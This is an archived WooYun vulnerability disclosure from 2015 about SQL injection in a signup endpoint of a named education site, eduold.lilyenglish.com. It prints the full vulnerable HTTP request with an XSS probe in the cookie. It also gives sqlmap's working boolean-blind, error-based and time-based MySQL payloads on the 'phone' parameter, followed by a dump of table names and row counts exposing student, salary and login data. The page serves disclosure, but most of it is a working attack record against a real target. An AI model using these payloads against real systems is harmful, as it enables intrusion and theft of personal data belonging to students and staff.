乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经主动忽略漏洞,细节向公众公开
POST /zc/opCheckInfo HTTP/1.1Content-Length: 397Content-Type: application/x-www-form-urlencodedCookie: OSM=7km7j7o67jef3826t9kp6eao21; CNZZDATA3500643=cnzz_eid%3D1321326244-1447658263-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447658263; __utmt=1; __utma=161720296.317590837.1447658264.1447658264.1447658264.1; __utmb=161720296.1.10.1447658264; __utmc=161720296; __utmz=161720296.1447658264.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")Host: eduold.lilyenglish.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*classes_id=11544&cnname=e&phone=11®ion_id=10&serial=e&signuptype=1&_=
涉及44库:
sqlmap resumed the following injection point(s) from stored session:---Parameter: phone (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: classes_id=11544&cnname=e&phone=-9389") OR 6379=6379#®ion_id=10&serial=e&signuptype=1&_= Vector: OR [INFERENCE]# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: classes_id=11544&cnname=e&phone=11") AND (SELECT 1377 FROM(SELECT COUNT(*),CONCAT(0x7170787671,(SELECT (ELT(1377=1377,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("prtl"="prtl®ion_id=10&serial=e&signuptype=1&_= Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: classes_id=11544&cnname=e&phone=11") AND (SELECT * FROM (SELECT(SLEEP(5)))mGJp) AND ("LBwc"="LBwc®ion_id=10&serial=e&signuptype=1&_= Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---back-end DBMS: MySQL 5.0Database: homework+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| `校内网录音下载日志` | 34005829 || lily_downstats | 4795086 || `2014_mp3_download_log` | 2883620 || lily_32_downlogs | 1899901 || lily_28_downlogs | 1776971 || lily_down_28 | 1776971 || lily_26_downlogs | 1740998 || lily_30_downlogs | 1699730 || lily_34_downlogs | 1193222 || lily_downdailyusers | 1170052 || temperatures | 1123873 || lily_downstat_today | 987384 || lily_32_edufeed | 858739 || lily_30_edufeed | 847982 || lily_28_edufeed | 811629 || lily_32_student_performances | 713547 || lily_28_student_performances | 699378 || lily_29_downlogs | 682139 || lily_30_student_performances | 678993 || lily_26_student_performances | 673163 || `短信队列` | 670469 || lily_33_downlogs | 632292 || `2014_homework_read_log` | 602651 || lily_34_edufeed | 588179 || lily_32_downlogs_web | 503238 || lily_34_student_performances | 449627 || lily_feed_old | 410959 || lily_30_downlogs_web | 401287 || lily_28_downlogs_web | 387851 || `登录日志` | 367930 || lily_student_archive | 363956 || lily_classes_student | 349573 || lily_business_logs | 336046 || lily_order_logs | 315386 || lily_34_downlogs_web | 296475 || lily_acc_logs | 291675 || `借阅日志` | 270564 || lily_33_student_performances | 267208 || lily_29_student_performances | 250364 || lily_33_edufeed | 241927 || lily_27_downlogs | 230249 || lily_31_downlogs | 223465 || lily_29_edufeed | 214003 || lily_26_downlogs_web | 204133 || `订单表` | 187550 || lily_student_archive_130115 | 176433 || lily_student_region | 173521 || lily_serial_logs | 153345 || lily_record_info | 138012 || lily_downstat_today_old | 130301 || course_log | 128036 || create_tuition_log | 106662 || lily_student_test | 101284 || lily_29_downlogs_web | 98583 || lily_kq_region_teachers | 94629 || lily_32_downlists | 91504 || lily_downqueues | 91180 || goods_nvestigate | 90254 || lily_31_student_performances | 87527 || lily_27_edufeed | 87242 || lily_28_downlists | 86887 || lily_26_downlists | 85465 || lily_27_student_performances | 84070 || lily_31_edufeed | 83847 || lily_30_downlists | 81418 || lily_26_edufeed | 80251 || lily_rszp_interview | 79239 || lily_experience | 59736 || lily_34_downlists | 57885 || lily_tingke_comment | 55227 || `2014_sid_status` | 49199 || lily_members | 49196 | //5万学员信息| xtelview | 49196 || `预报名学员` | 47098 || lily_users | 45050 || lily_boxmsg_logs | 43654 || lily_rszp_userinform | 43570 || lily_classes_attendtime | 39559 || lily_course_planlog | 38040 || student_order | 37697 || lily_28_homework | 36070 || lily_32_homework | 35656 || lily_26_homework | 35521 || lily_28_teacher_performances | 35080 || lily_32_teacher_performances | 34880 || lily_30_comments | 34450 || lily_26_teacher_performances | 34082 || lily_30_homework | 33751 || lily_29_downlists | 33743 || lily_30_teacher_performances | 33287 || lily_30_examscores | 32696 || lily_30_examscores_v | 32696 || lily_32_examscores | 31641 || lily_32_examscores_v | 31641 || lily_33_downlists | 31584 || lily_teacher_homeworkcollect | 31062 || lily_33_downlogs_web | 30872 || lily_26_examscores_old | 30782 || lily_34_refer_edu | 29884 || lily_27_downlogs_web | 28703 || lily_28_examscores | 28669 || lily_28_examscores_v | 28669 || lily_book_logs | 28663 || lily_33_examscores | 28482 || lily_33_examscores_v | 28482 || lily_32_refer_edu | 28479 || lily_26_examscores | 27844 || lily_26_examscores_v | 27844 || lily_30_refer_edu | 27559 || lily_28_refer_edu | 27309 || lily_29_examscores | 26872 || lily_29_examscores_v | 26872 || lily_parent_evaluation | 26812 || lily_teacher_history | 25610 || lily_library_book_logs | 25574 || lily_staff_gongzi | 24878 || lily_rszp_processlog | 24318 || receipt | 23770 || lily_34_homework | 23682 || lily_linux_clients | 23336 || lily_classes_teacher | 23315 || lily_library_bookreview_studentanswer | 23246 || lily_32_exam | 23240 || lily_26_comments | 23211 || lily_33_refer_edu | 22822 || lily_34_teacher_performances | 22328 || lily_28_exam | 22065 || lily_30_exam | 22025 || lily_classes_relation | 21742 || lily_29_refer_edu | 21419 || lily_26_exam | 20309 || lily_31_downlogs_web | 20210 || lily_28_comments | 19796 || lily_32_comments | 19783 || lily_28_examscores_v0 | 19758 || lily_classes | 19552 || lily_feed | 19155 || lily_26_examscores_v0 | 19022 || lily_30_examscores_v0 | 18308 || lily_32_examscores_v0 | 18239 || lily_26_exam_inform | 18233 || lily_library_book_lists | 18225 || lily_28_exam_inform | 18186 || lily_hr_gongzi | 17995 || lily_30_exam_inform | 17536 || lily_32_exam_inform | 17340 || lily_student_test_timelogs | 17041 || lily_33_examscores_v0 | 16891 || lily_29_examscores_v0 | 16523 || liubo_questionnaire | 16440 || lily_classes_hour | 15828 || lily_26_terminaljudge | 15649 || dashboard | 15543 || lily_data_logs | 15339 || lily_classes_evaluate | 14501 || lily_library_reading_history | 14100 || lily_33_homework | 13808 || lily_student_test_returnvisit | 13420 || lily_24_terminaljudge | 13395 || lily_33_teacher_performances | 13356 || lily_29_homework | 12816 || lily_34_comments | 12790 || lily_tingke | 12784 || lily_classes_summarytest | 12643 || lily_29_teacher_performances | 12633 || lily_communic_record | 11986 || lily_27_downlists | 11796 || callbacklist_questionnaire | 11771 || lily_student_investigate | 11070 || lily_31_downlists | 10791 || lily_service_project | 9975 || lily_complaint | 9630 || lily_32_examscores_v1 | 9018 || lily_document | 8544 || lily_2d_code | 8372 || lily_classes_recording | 7911 || lily_31_refer_edu | 7386 || lily_27_refer_edu | 7167 || lily_30_examscores_v1 | 6830 || lily_33_examscores_v1 | 6763 || lily_28_examscores_v1 | 6612 || lily_library_book_users | 6369 || lily_26_examscores_v1 | 6235 || lily_operations_kpi | 6045 || lily_student_transfer | 5750 || lily_return | 5448 || lily_turnover_rate | 5408 || lily_book_lists | 5371 || lily_member_changeshift | 5334 || lily_29_examscores_v1 | 5284 || temp_investgate_xiaonei | 5247 || `试听课打印单流水` | 5150 || lily_changeclasses | 4571 || lily_27_homework | 4489 || lily_27_teacher_performances | 4404 || lily_31_homework | 4298 || lily_31_teacher_performances | 4226 || lily_members_info | 4157 || lily_book_users | 4107 || task_queue | 3777 || lily_course_classes | 3611 || lily_kq_regions | 3543 || lily_staff_gongzi_tmp | 3216 || lily_acc_logs_refund | 3124 || lily_29_comments | 3118 || lily_tutor_settings | 2879 || lily_33_comments | 2649 || lily_invoice | 2444 || lily_student_phonelogs | 2229 || gonghao | 2099 || lily_tutor | 2023 || lily_library_addbook_log | 2012 || lily_tutor_gongzi | 1995 || lily_classes_material | 1953 || lily_teacher_post | 1952 || lily_library_bookreview | 1945 || lily_publicclass | 1878 || lily_teacher_event | 1834 || lily_material_record | 1817 || lily_tapes | 1787 || lily_28_exam_rule | 1774 || lily_34_billboard | 1749 || lily_26_exam_rule | 1694 || lily_teacher_accidents | 1683 || lily_30_exam_rule | 1677 || lily_creadit | 1670 || lily_33_billboard | 1656 || lily_32_exam_rule | 1655 || lily_teacher_month_cont | 1503 || lily_32_billboard | 1492 || lily_30_billboard | 1488 || lily_27_comments | 1487 || lily_caijiang2011 | 1443 || lily_warehouse_list | 1410 || lily_30_wastagerate | 1397 || lily_library_region_stock | 1373 || lily_order_logs_refund | 1297 || lily_28_wastagerate | 1288 || lily_29_billboard | 1283 || lily_log | 1260 || lily_26_wastagerate | 1253 || lily_28_billboard | 1253 || pscns | 1250 || lily_32_wastagerate | 1247 || lily_26_billboard | 1223 || lily_31_comments | 1200 || lily_33_wastagerate | 1129 || lily_admissions | 1112 || lily_teacher_detailed | 1110 || lily_teachers | 1109 || lily_29_wastagerate | 1080 || lily_business_logs_refund | 1059 || lily_staff | 1034 || lily_2014_student_performances | 1015 || lily_tutor_classes | 1000 || lily_diliver_list | 994 || lily_wastagerate | 950 || lily_bound | 905 || lily_rszp_school | 802 || lily_teacher_scores | 796 || lily_library_bookreview_question | 763 || lily_teacher_praise | 725 || lily_31_billboard | 696 || lily_2014_downlogs | 682 || lily_student_markinfo | 673 || lily_admin | 671 || lily_teaching_log | 647 || lily_map_operationsaccess | 553 || lily_teacher_leavelsfei | 552 || `教师编码表` | 535 || weixin | 503 || lily_admin_group_access | 494 || lily_books | 470 || lily_map_admin | 461 || lily_student_discount | 433 || lily_teacher_lastkq | 416 || lily_classes_group | 411 || camplily | 408 || lily_monitor_equipment | 402 || lily_teacher_leavels | 395 || lily_course | 393 || lily_27_wastagerate | 374 || lily_27_billboard | 368 || lily_consultation | 361 || lily_31_wastagerate | 355 || lily_book_content | 330 || lily_library_book_content | 330 || lily_new_classes | 321 || lily_kq_items | 304 || lily_admin_resource_doresource | 294 || lily_achievement | 280 || lily_region_setting | 270 || lily_tutor_estimate | 270 || lily_library_books | 269 || lily_teacher_complaint | 258 || lily_material | 239 || lily_turnover | 238 || sheet1 | 232 || lily_paylevel_logs | 231 || remove_lily_operations_management | 215 || remove_lily_topfive_votes | 212 || lily_teacher_resign | 203 || lily_inspection | 201 || lily_camp_qa | 197 || lily_sanction | 188 || online | 151 || lily_staff_grade | 144 || lily_teacher_rule | 143 || reading_score | 143 || lily_kq_teacher | 139 || complain | 136 || lily_student_blacklist | 135 || tbl_op_sch_check | 128 || lily_posts | 116 || lily_goods_order | 115 || lily_attendtime | 110 || lily_middle_students | 108 || lily_wh_register | 102 || lily_admin_resource | 100 || dailyperformance | 98 || lily_resignation | 97 || jjjjj | 96 || lily_library_cancel_log | 96 || lily_tuijian | 95 || lily_graduates | 87 || video | 85 || lily_course_items | 84 || lily_middle_classes_students | 84 || lily_user_scorecard | 80 || lily_course_apply | 79 || lily_msg_log | 74 || lily_leave | 73 || lily_rszp_professional | 72 || lily_postrecord | 70 || lily_33_exam_inform | 69 || lily_kq_holiday | 68 || v_result_teacher_investigate | 54 || lily_teacher_map | 53 || `工作任务` | 50 || `2014_test_temp` | 43 || camp_gradelist | 43 || lily_acc_accounts | 43 || lily_resume | 43 || lily_2014_downlists | 42 || lily_hr_class | 40 || goodslist | 37 || lily_dl_register | 36 || lily_operations_leavels | 35 || lily_operations_map | 35 || lily_province | 35 || lily_36_downlists | 34 || lily_cost | 34 || lily_grade | 34 || lily_creadit_copy | 33 || lily_semester | 33 || lily_teacher_resignself | 30 || lily_33_exam | 29 || lily_hr_position | 28 || lily_29_exam_inform | 27 || lily_library_book_albums | 27 || lily_book_albums | 26 || lily_train | 26 || lily_regions | 25 || lily_department | 24 || lily_settings | 24 || lily_staff_configs | 23 || lily_operations_resign | 22 || school | 22 || lily_operations_post | 21 || camp_age | 18 || lily_28_web | 13 || lily_downsession | 13 || lily_post | 12 || lily_praise | 12 || lily_admin_group | 11 || lily_32_web | 10 || lily_admin_doresource | 10 || lily_student_acc_setup | 9 || lilyren_comment | 8 || lily_30_web | 7 || lily_31_web | 7 || lily_34_web | 7 || lily_company | 7 || lily_34_exam_rule | 6 || xxb_program | 6 || lily_29_exam_rule | 5 || lily_boxmsg | 5 || lilyren_article | 5 || remove_lily_topfive | 5 || taxcontrolmachine | 5 || lily_30_basefee | 4 || lily_33_exam_rule | 4 || lily_archive_level | 4 || lily_archive_managelevel | 4 || lily_middle_classes | 4 || lily_teacher_month | 4 || lily_userfile | 4 || classify | 3 || jishubu_weixiu | 3 || lily_material_lost | 3 || lily_msg_view | 3 || lily_semester_coursetime | 3 || lily_teacher_comps | 3 || jishubu_tele | 2 || lily_26_basefee | 2 || lily_27_basefee | 2 || lily_27_web | 2 || lily_28_basefee | 2 || lily_29_basefee | 2 || lily_29_web | 2 || lily_33_web | 2 || lily_30_downlogs_ios | 1 || lily_31_basefee | 1 || lily_32_basefee | 1 || lily_33_basefee | 1 || lily_34_basefee | 1 || lily_35_basefee | 1 || lily_36_basefee | 1 || lily_auth_apply | 1 || lily_formteacher_student | 1 || lily_staff_settings | 1 || lily_teacher_quarter | 1 || videolist | 1 |+---------------------------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-12-02 11:10
漏洞Rank:4 (WooYun评价)
2015-12-03:已经解决
